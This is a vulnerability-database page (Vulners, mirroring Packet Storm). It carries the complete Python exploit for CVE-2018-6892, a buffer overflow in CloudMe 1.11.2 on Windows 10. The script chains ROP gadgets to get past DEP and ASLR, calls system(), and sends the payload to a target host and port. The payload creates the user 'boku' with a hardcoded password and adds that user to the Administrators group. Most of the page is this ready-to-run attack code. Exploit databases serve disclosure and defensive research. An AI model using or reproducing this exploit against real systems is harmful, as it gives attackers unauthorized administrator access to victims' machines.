Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

CloudMe 1.11.2 Buffer Overflow

🗓️ 29 Sep 2020 00:00:00Reported by Bobby CookeType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 248 Views

CloudMe 1.11.2 - Turing Complete Add-Admin ROP (DEP,ASLR), Buffer Overflow, Windows 10, Python 2.7, CVE-2018-6892, CloudMe.exe, Create New User, Administrators Group, Multiple Windows 10 System

Related
Code
ReporterTitlePublishedViews
Family
0day.today		CloudMe Sync 1.10.9 Remote Buffer Overflow Vulnerability
12 Feb 201800:00
zdt
0day.today		CloudMe Sync 1.10.9 Buffer Overflow Exploit
23 Feb 201800:00
zdt
0day.today		CloudMe Sync 1.9.2 Remote Buffer Overflow Exploit
6 Mar 201800:00
zdt
0day.today		Cloudme 1.9 - Buffer Overflow (DEP) Учздщше
14 Aug 201800:00
zdt
0day.today		CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt Exploit
22 Jan 201900:00
zdt
0day.today		CloudMe Sync 1.11.2 Buffer Overflow - WoW64 - (DEP Bypass) Exploit
28 Jan 201900:00
zdt
0day.today		CloudMe 1.11.2 SEH Buffer Overflow Exploit
3 Aug 202000:00
zdt
0day.today		CloudMe 1.11.2 - Buffer Overflow ROP (DEP,ASLR) Exploit (2)
29 Sep 202000:00
zdt
Circl		CVE-2018-6892
13 Feb 201800:00
circl
CNVD		CloudMe Buffer Overflow Vulnerability
12 Feb 201800:00
cnvd
Rows per page
`# Exploit Title: CloudMe 1.11.2 - Turing Complete Add-Admin ROP (DEP,ASLR)  
# Exploit Author: Bobby Cooke (boku)  
# CVE: CVE-2018-6892  
# Date: September 29th, 2020  
# Vendor Homepage: https://www.cloudme.com/  
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe  
# Version: 1.11.2  
# Tested On: Windows 10 (x64) - 10.0.19041 Build 19041  
# Script: Python 2.7  
# Notes:  
# This exploit uses MSVCRT.System to create a new user (boku:0v3R9000!) and add the new user to the   
# Administrators group. A requirement of successful exploitation is the CloudMe.exe process must be   
# running as adminstrator, such as when ran with 'Run as Administrator'; as this permission is required   
# to create new users on the system. This exploit has been tested against multiple Windows 10 systems   
# including x86, x64, Pro, Education, Home; although there is no guarantee it will work in your CTF.  
  
import os,sys,socket,struct  
from colorama import Fore, Back, Style  
  
F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE]  
B = [Back.RESET,Back.BLACK,Back.RED,Back.GREEN,Back.YELLOW,Back.BLUE,Back.MAGENTA,Back.CYAN,Back.WHITE]  
S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT]  
ok = S[3]+F[2]+')'+F[5]+'+++'+F[2]+'['+F[8]+'========> '+S[0]+F[0]  
err = S[3]+F[2]+'<========'+F[2]+'['+F[5]+'+++'+F[2]+'( '+F[0]+S[0]  
def formatMsg(STRING):  
return ok+S[3]+F[5]+STRING+S[0]  
def formatErr(STRING):  
return err+S[3]+F[2]+STRING+S[0]  
  
# Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Modulename  
# -------------------------------------------------------------------------------------------------------  
# 0x69900000 | 0x69ac1000 | False | False | False | False | False | [Qt5Network.dll]  
# 0x6eb40000 | 0x6eb64000 | False | False | False | False | False | [libgcc_s_dw2-1.dll]  
# 0x68a80000 | 0x69055000 | False | False | False | False | False | [Qt5Core.dll]  
# 0x00400000 | 0x00831000 | False | False | False | False | False | [CloudMe.exe]  
# 0x6d9c0000 | 0x6da0c000 | False | False | False | False | False | [Qt5Sql.dll]  
# 0x64b40000 | 0x64b5b000 | False | False | False | False | False | [libwinpthread-1.dll]  
# 0x66e00000 | 0x66e3d000 | False | False | False | False | False | [Qt5Xml.dll]  
  
def getESP_RC():  
GaDG3Tz = [  
# ESP -> EDI  
# Clobbers: BL # [EBX+5E5B10C4] must be writable # Requires ROPNOP  
# Address=68F79000 Size=0007A000 (499712.) Owner=Qt5Core 68A80000 Section=.eh_fram Type=Imag 01001002 Access=RWE CopyOnWr   
0x68bb4678, # POP EBX # RETN [Qt5Core.dll]   
0x0A9C8F3C, # EBX + 0x5E5B10C4 = 0x68F7A000 = Writeable Memory  
0x68d5e818, # PUSH ESP # OR BL,DL # INC DWORD PTR DS:[EBX+5E5B10C4] # POP EDI # RETN 0x04 [Qt5Core.dll]  
0x68D50537, # RETN - ROPNOP  
0x68D50537 # RETN - ROPNOP  
]  
print(formatMsg("Get ESP ROP Chain built!"))  
return ''.join(struct.pack('<I', _) for _ in GaDG3Tz)  
  
def msvcrt_rop_chain():  
GaDG3Tz = [  
# HMODULE LoadLibraryA( LPCSTR lpLibFileName);  
# $ ==> > CALL to LoadLibraryA  
# $+4 > FileName = "msvcrt.dll"  
# EAX = 0x512 = 1298  
0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]  
0xFFFFFAEE, # NEG FFFFFAEE = 0x512  
0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]  
# EDI + EAX = End of string "msvcrt.dll"  
0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll]   
# EAX = 0x01  
0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]  
0xFFFFFFFF, # NEG FFFFFFfF = 0x01  
0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]  
# EAX = 0x0  
0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll]  
# ECX = 0x0  
0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll]   
# Terminate String "msvcrt.dll"  
0x68cee06d, # XOR ESI,ESI # RETN [Qt5Core.dll] (Clear ESI)  
0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI)  
0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll]  
# EAX = -0xA = 0xFFFFFFF6  
0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]  
0xFFFFFFF6, # -0xA  
# ESI = Start of string "msvcrt.dll\x00"  
0x68c050c0, # ADD ESI,EAX # INC EBP # RETN [Qt5Core.dll]  
# EAX = PTR LoadLibraryA (from CloudMe Import Table)  
# CloudMe Address=0081A168 Section=.idata Type=Import (Known) Name=KERNEL32.LoadLibraryA  
0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]  
0xFF7E5E98, # NEG FF7E5E98 = 0081A168 = PTR Kernel32.LoadLibraryA  
0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]  
# EAX = kernel32.LoadLibraryA  
0x699030c5, # mov eax,dword ptr ds:[eax] [Qt5Network.dll]   
# ESI = kernel32.LoadLibraryA # EAX = Addr string "msvcrt.dll\x00"  
0x68d50536, # XCHG EAX,ESI # RETN [Qt5Core.dll]  
# For PUSHAD we need: EDI=FarRETN # ESI=&LoadLibraryA # EAX=["msvcrt.dll"] # ECX=ROPNOP  
0x68d32800, # POP ECX # RETN [Qt5Core.dll]  
0x68D50537, # RETN - ROPNOP  
0x699f37ad, # POP EDI # RETN [Qt5Network.dll]  
0x6990F972, # RETN 10 [Qt5Network.dll]   
0x68f7bc5e, # pushad # ret # [Qt5Core.dll]  
# EAX -> EBP = msvcrt.dll  
0x68cc462c # XCHG EAX,EBP # RETN [Qt5Core.dll]  
# EBP = msvcrt.dll  
]  
print(formatMsg("LoadLibraryA(LPSTR \"msvcrt.dll\") ROP Chain built!"))  
return ''.join(struct.pack('<I', _) for _ in GaDG3Tz)  
  
def GetProc_system_rop_chain():  
GaDG3Tz = [  
# FARPROC GetProcAddress( HMODULE hModule, LPCSTR lpProcName);  
# $ ==> > CALL to GetProcAddress # EDX (ROPNOP)  
# $+4 > hModule = [msvcrt] # ECX  
# $+8 > ProcNameOrOrdinal (system) # EAX  
# EAX = 0x4a2 = 1186  
0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]  
0xFFFFFB5E, # NEG FFFFFB5E = 0x4A2  
0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]  
# EDI + EAX = End of string "system"  
0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll]   
# EAX = 0x01  
0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]  
0xFFFFFFFF, # NEG FFFFFFfF = 0x01  
0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]  
# EAX = 0x0  
0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll]  
# ECX = 0x0  
0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll]  
# Terminate String "system"  
0x68cee06d, # XOR ESI,ESI # RETN [Qt5Core.dll] (Clear ESI)  
0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI)  
0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll]  
# EAX = -0x6 = 0xFFFFFFFA  
0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]  
0xFFFFFFFA, # -0x6  
# ESI = Start of string "system\x00"  
0x68c050c0, # ADD ESI,EAX # INC EBP # RETN [Qt5Core.dll]  
0x68fcf58d, # DEC EBP # RETN [Qt5Core.dll](fix EBP for prev gadgets)   
# EAX = PTR GetProcAddr (from CloudMe Import Table)  
# CloudMe Address=0081A148 # Section=.idata # Type=Import # Name=KERNEL32.GetProcAddress  
0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]  
0xFF7E5EB8, # NEG FF7E5EB8 = 0081A148 = PTR Kernel32.GetProcAddr  
0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]  
0x699030c5, # mov eax,dword ptr ds:[eax] [Qt5Network.dll]   
0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll]  
0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll]  
# ESI = &kernel32.GetProcAddr # ECX=["system\x00"]# EBP=msvcrt.dll   
# For PUSHAD we need: EDI=FarRETN # ESI=&GetProcAddress # ECX=msvcrt.dll # EAX=["system"]# EDX=ROPNOP  
# EBP -> EAX = msvcrt.dll  
0x68cc462c, # XCHG EAX,EBP # RETN [Qt5Core.dll]  
# ECX=&msvcrt.dll # EAX=["system\x00"]  
0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll]  
# EDX=ROPNOP  
0x68f94685, # POP EDX # RETN [Qt5Core.dll]  
0x68D50537, # RETN - ROPNOP  
# EDI=FarRETN  
0x699f37ad, # POP EDI # RETN [Qt5Network.dll]  
0x699010B4, # ret 0C [Qt5Network.dll]   
# KERNEL32.GetProcAddress [ESI pushed to stack]  
# [EBP pushed to stack]  
# [ESP pushed to stack]  
# [EBX pushed to stack]  
# land after ret 0xC -> Qt5Core.68D50537 (ROPNOP) [EDX pushed to stack]  
# MSVCRT.75F60000 [ECX pushed to stack]  
# ASCII "system" [EAX pushed to stack]  
0X68f7bc5e, # pushad # ret # [Qt5Core.dll]  
0x68b1df17 # XCHG EAX,EDX # RETN # [Qt5Core.dll]  
# EDX = msvcrt.system  
]  
print(formatMsg("GetProcAddress(HMODULE msvcrt, LPCSTR system) ROP Chain built!"))  
return ''.join(struct.pack('<I', _) for _ in GaDG3Tz)  
  
def addUsr_rop_chain():  
GaDG3Tz = [  
# int system( const char *command);  
# $ ==> > CALL to system  
# $+4 > command = "net user boku 0v3R9000! /add"  
# EAX = 0x438 = 1080   
0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]  
0xFFFFFBC8, # NEG 0xFFFFFBC8 = 0x438  
0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]  
# EDI + EAX = End of string "net user..."  
0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll]   
# EAX = 0x01  
0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]  
0xFFFFFFFF, # NEG FFFFFFfF = 0x01  
0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]  
# EAX = 0x0  
0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll]  
# ECX = 0x0  
0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll]  
# Terminate String "net user..."  
0x68cee06d, # XOR ESI,ESI # RETN [Qt5Core.dll] (Clear ESI)  
0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI)  
0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll]  
# EAX = -28 = -0x1C = 0xFFFFFFE4  
0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]  
0xFFFFFFE4, # -28 = -0x1C  
# ESI = Start of string "net user...\x00"  
0x68c050c0, # ADD ESI,EAX # INC EBP # RETN [Qt5Core.dll]  
# EDX = MSVCRT.system # ECX=0x0  
# For PUSHAD we need: EDI=FarRETN # ESI=MSVCRT.system # EAX=["net user.."] # ECX=POP+RET  
0x68d32800, # POP ECX # RETN [Qt5Core.dll]  
0x699f37ad, # POP EDI # RETN [Qt5Network.dll]  
# ESI = MSVCRT.system # EAX = ["net user.."]  
0x68b1df17, # XCHG EAX,EDX # RETN # [Qt5Core.dll]  
0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll]  
# EDI=FarRETN  
0x699f37ad, # POP EDI # RETN [Qt5Network.dll]  
0x6990F972, # RETN 10 [Qt5Network.dll]   
# PUSHAD - Setup Call to MSVCRT.system on stack  
0X68f7bc5e # pushad # ret # [Qt5Core.dll]  
]  
print(formatMsg("system(const char* \"net user boku 0v3R9000! /add\") ROP Chain built!"))  
return ''.join(struct.pack('<I', _) for _ in GaDG3Tz)  
  
def addAdm_rop_chain():  
GaDG3Tz = [  
# ESI = msvcrt.system  
# ESI -> EDX  
0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll]  
0x68b1df17, # XCHG EAX,EDX # RETN # [Qt5Core.dll]  
# EAX = 0x3F7   
0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]  
0xFFFFFC09, # NEG 0xFFFFFC09 = 0x3F7  
0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]  
# EDI + EAX = End of string "net local..."  
0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll]   
# EAX = 0x01  
0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]  
0xFFFFFFFF, # NEG FFFFFFfF = 0x01  
0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]  
# EAX = 0x0  
0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll]  
# ECX = 0x0  
0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll]  
# Terminate String "net local..."  
0x68cee06d, # XOR ESI,ESI # RETN [Qt5Core.dll] (Clear ESI)  
0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI)  
0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll]  
# EAX = -39 = -0x27 = 0xFFFFFFE4  
0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]  
0xFFFFFFD9, # -39 = -0x27  
# ESI = Start of string "net local...\x00"  
0x68c050c0, # ADD ESI,EAX # INC EBP # RETN [Qt5Core.dll]  
# EDX = MSVCRT.system # ECX=0x0  
# For PUSHAD we need: EDI=FarRETN # ESI=MSVCRT.system # EAX=["net local.."] # ECX=ROPNOP  
0x68d32800, # POP ECX # RETN [Qt5Core.dll]  
0x699f37ad, # POP EDI # RETN [Qt5Network.dll]  
# ESI = MSVCRT.system # EAX = ["net local.."]  
0x68b1df17, # XCHG EAX,EDX # RETN # [Qt5Core.dll]  
0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll]  
# EDI=FarRETN  
0x699f37ad, # POP EDI # RETN [Qt5Network.dll]  
0x6990F972, # RETN 10 [Qt5Network.dll]   
# PUSHAD - Setup Call to MSVCRT.system on stack  
0X68f7bc5e # pushad # ret # [Qt5Core.dll]  
]  
print(formatMsg("system(const char* \"net localgroup Administrators boku /add\") ROP Chain built!"))  
return ''.join(struct.pack('<I', _) for _ in GaDG3Tz)  
  
def sendRecv(s,p):  
print(formatMsg("Sending payload: "))  
print(S[3]+F[7]+payload+S[0])  
s.send(p)  
data = s.recv(1024)  
return data  
  
def header():  
head = S[3]+F[2]+' --- Cloudme v1.12 | Add Admin (boku:0v3R9000!) ---\n'+S[0]  
return head  
  
def sig():  
SIG = S[3]+F[4]+" .-----.._ ,--.\n"  
SIG += F[4]+" | .. > ___ | | .--.\n"  
SIG += F[4]+" | |.' ,'-'"+F[2]+"* *"+F[4]+"'-. |/ /__ __\n"  
SIG += F[4]+" | </ "+F[2]+"* * *"+F[4]+" \ / \\/ \\\n"  
SIG += F[4]+" | |> ) "+F[2]+" * *"+F[4]+" / \\ \\\n"  
SIG += F[4]+" |____..- '-.._..-'_|\\___|._..\\___\\\n"  
SIG += F[4]+" _______"+F[2]+"github.com/boku7"+F[4]+"_____\n"+S[0]  
return SIG  
  
def footer():  
foot = formatMsg('Requires that the Cloudme program is ran using \'Run As Administrator\'\n')  
return foot  
  
if __name__ == "__main__":  
print(header())  
print(sig())  
print(footer())  
if len(sys.argv) != 3:  
print(formatErr("Usage: python %s <IP> <PORT>" % sys.argv[0]))  
print(formaterr("Example: python %s '127.0.0.1' 8888" % sys.argv[0]))  
sys.exit(-1)  
host = sys.argv[1]  
port = int(sys.argv[2])  
  
rop_chain = getESP_RC() + msvcrt_rop_chain() + getESP_RC() + GetProc_system_rop_chain() + getESP_RC() + addUsr_rop_chain() + getESP_RC() + addAdm_rop_chain()  
  
os_EIP = '\41'*1052  
os_nSEH = '\x41'*(2344-len(os_EIP + rop_chain))  
nSEH = '\x42'*4  
SEH = '\x43'*4  
buff = os_EIP + rop_chain + os_nSEH + nSEH + SEH  
  
term = '\r\n'  
kern32 = 'msvcrt.dll'+'AAAAAA'  
winExe = 'system'+'BBBBBB'  
addUsr = 'net user boku 0v3R9000! /add'+'CCCC'  
addAdm = 'net localgroup Administrators boku /add'+'DDDD'  
rmdr = '\x44'*(3854-len(buff)-len(kern32)-len(winExe)-len(addAdm))  
payload = buff + kern32 + winExe + addUsr + addAdm + rmdr + term  
  
try:  
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
sock.connect((host,port))  
print(formatMsg( "Successfully connected to "+host+" on port "+str(port)))  
resp = sendRecv(sock,payload)  
print(formatMsg("Closing Socket"))  
sock.close()  
print(formatErr("Exiting python script."))  
except:  
print(formatErr("Failed to connect and send payload."))  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 Sep 2020 00:00Current
0.6Low risk
Vulners AI Score0.6
EPSS0.89668
cloudme 1.11.2turing completeadd-adminropdepaslrbuffer overflowwindows 10python 2.7cve-2018-6892cloudme.execreate new useradministrators groupmultiple windows 10 systems
248